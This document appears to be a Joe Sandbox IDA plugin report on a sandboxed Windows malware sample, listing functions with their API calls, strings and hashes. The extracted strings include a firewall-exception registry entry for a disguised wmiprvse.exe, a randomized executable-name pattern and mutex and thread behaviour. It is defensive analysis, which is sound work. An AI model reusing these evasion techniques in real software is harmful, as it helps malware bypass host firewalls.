Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: ErrorExceptionLastLibraryRaise$AddressAllocExchangeFreeInterlockedLoadLocalProc
String ID: $
API String ID: 991255547-3993045852
Opcode ID: 256256f5bea5ef9629b74784c89f9cd366c968008bba8740bb1e0df359706086
Instruction ID: 003abd56770ea85181eee10679b32b4024c484e765cb6dd7374dfc17ffc6279b
Opcode Fuzzy Hash: 256256f5bea5ef9629b74784c89f9cd366c968008bba8740bb1e0df359706086
Instruction Fuzzy Hash: C3612DB5B006059FDB24CF99C984AAABBF9AB48301B10403EE956F7391D774EE04CF14

Function 00405620 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 178sleepthreadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 00405895

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(00000028), ref: 00405887

Strings

L8@, xrefs: 0040569D
%d.%d.%d.%d, xrefs: 004057B0
E, xrefs: 00405744
[@, xrefs: 004056C1
8@, xrefs: 0040567F
<6@, xrefs: 004057B6
p8@, xrefs: 004056D6
AAAA, xrefs: 00405664

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CountExitSleepThreadTickrand
String ID: %d.%d.%d.%d$<6@$AAAA$E$L8@$p8@$8@$[@
API String ID: 896407411-1437862014
Opcode ID: 2082310ec20457ce4bd3376e800f9b479eea37f891fde78d827ab7b4555d5ca3
Instruction ID: 7e6662bb6761759f066e7e86b2ee24da49ec5426ddd9b74326a3b1faf3b9be8f
Opcode Fuzzy Hash: 2082310ec20457ce4bd3376e800f9b479eea37f891fde78d827ab7b4555d5ca3
Instruction Fuzzy Hash: A0510470548380AAE320EF64CC45B5BB7E8EFD4308F00492DF695A72D1E7B595098B6B

Function 004020D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98librarystringloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,00000000,100200), ref: 004020DF
ReleaseMutex.KERNEL32(00000000), ref: 004020EC
CloseHandle.KERNEL32(00000000), ref: 004020F3
lstrcatA.KERNEL32(?,?), ref: 004021AC
GetProcAddress.KERNEL32(00000000,?), ref: 004021BF

Strings

100200, xrefs: 004020D3, 00402279
stf%c%c%c%c%c.exe, xrefs: 0040218D
<6@, xrefs: 00402193

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Mutex$AddressCloseHandleOpenProcReleaselstrcat
String ID: 100200$<6@$stf%c%c%c%c%c.exe
API String ID: 2376757572-3190100693
Opcode ID: d112f5c9d013e11b3731d5647da893e1883a61e01d2132f2d5a6d2d8178d5850
Instruction ID: 7c7aac5ec1300530b19c54ce4657de090f08845e18d217751b06ad59df05bcf8
Opcode Fuzzy Hash: d112f5c9d013e11b3731d5647da893e1883a61e01d2132f2d5a6d2d8178d5850
Instruction Fuzzy Hash: B731EBF26443007BE760AB60DD0AFAF7668BB44706F00453DF746B61C1EDB49604866B

Function 7FE332CF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98sleeplibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,7FE332C3), ref: 7FE332D0
GetModuleFileNameA.KERNEL32(00000000,C:\Windows\sysWOW64\wbem\wmiprvse.exe,000000C8), ref: 7FE332E5
wsprintfA.USER32 ref: 7FE332FA
CreateThread.KERNEL32(00000000,00000000,7FE32C7D,00000000,00000000), ref: 7FE33343
CloseHandle.KERNEL32(?,0C1A4F68), ref: 7FE3334C
WSAStartup.WS2_32(00000101), ref: 7FE333D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3

Part of subcall function 7FE329F1: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE32A36
Part of subcall function 7FE329F1: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE32A55
Part of subcall function 7FE329F1: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE32A7F
Part of subcall function 7FE329F1: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE32A8C
Part of subcall function 7FE329F1: UnmapViewOfFile.KERNEL32(?), ref: 7FE32AA4

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE332F9
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE332E2, 7FE332F7

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: File$CloseHandleView$AddressCreateInformationModuleNameOpenProcQuerySectionSleepStartupSystemThreadUnmapwsprintf
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3988882592-1392025104
Opcode ID: 5a2e8885b122901e0e527b3c98aa0eb90efe88ce56f4889f66029a75c3141c74
Instruction ID: 806d303376319e10b4faa7ba5eb60574f11820cef6a731847cf1d174f778dc29
Opcode Fuzzy Hash: 5a2e8885b122901e0e527b3c98aa0eb90efe88ce56f4889f66029a75c3141c74
Instruction Fuzzy Hash: 82319031904719FFDB619F61CC0EFEA362CDF41711F404219F96A6A080DAF06F05CAA6

Function 0040348F Relevance: 16.6, APIs: 11, Instructions: 111COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 004034BC
__p__fmode.MSVCRT ref: 004034D1
__p__commode.MSVCRT ref: 004034DF
__setusermatherr.MSVCRT ref: 0040350B
_initterm.MSVCRT ref: 00403521
__getmainargs.MSVCRT ref: 00403544
_initterm.MSVCRT ref: 00403554
GetStartupInfoA.KERNEL32(?), ref: 00403593
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004035B7
exit.MSVCRT ref: 004035C7
_XcptFilter.MSVCRT ref: 004035D9

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: e284ab8ee17c914b7e9ddb28410b1748839fce9069ce7daa9396d3e96ef4b395
Instruction ID: dc900e3830a3569765129a6993a161ee3a7e101abcc0f586eb7ca925653150ca
Opcode Fuzzy Hash: e284ab8ee17c914b7e9ddb28410b1748839fce9069ce7daa9396d3e96ef4b395
Instruction Fuzzy Hash: 9C414AB1840304AFDB209FA4DD45AAA7FACEB09711F20057EE842B72E1D7785A41CF68

Function 00404EC0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 172sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(0000000A,?,?,?,00000200), ref: 0040510F
ExitThread.KERNEL32 ref: 00405118

Strings

L8@, xrefs: 00404F62
[@, xrefs: 00404F05
8@, xrefs: 00404EEC
P, xrefs: 00405029
@, xrefs: 00404FA7
E, xrefs: 00404F8B
p8@, xrefs: 00404F16

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CountExitSleepThreadTickrand
String ID: @$E$L8@$P$p8@$8@$[@
API String ID: 896407411-1894845992
Opcode ID: 6d76287d7377fc4d1ca150cdd5e1076a9e97807c64b402054d467cd7bc3b86a8
Instruction ID: d762af154df64fd3c6005db1ca3581d92c9b953f8629a195cdfd469d7596aa35
Opcode Fuzzy Hash: 6d76287d7377fc4d1ca150cdd5e1076a9e97807c64b402054d467cd7bc3b86a8
Instruction Fuzzy Hash: 30614C71548384AAD310DB64CC45B5FBBE9FF89308F40092DF688A72D1DAB49909CB9B

Function 004041CF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 159threadCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0040424F
ExitThread.KERNEL32 ref: 004043BB

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

sprintf.MSVCRT ref: 00404317
sprintf.MSVCRT ref: 00404348

Strings

L8@, xrefs: 0040422E
:8@, xrefs: 00404205
#0%s!, xrefs: 00404342
(8@, xrefs: 00404358
%s/%s, xrefs: 00404311

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: sprintf$CountExitThreadTickmallocrand
String ID: #0%s!$%s/%s$(8@$:8@$L8@
API String ID: 3712263441-812610358
Opcode ID: 1fb8edccde2239dcf819b419ffd2f10b3402cd0bf8fe435dcda30660f774dccf
Instruction ID: 1928d251c466a658d3dfa1dbb8552598425e23835ae83e9358d9328c5b0794ed
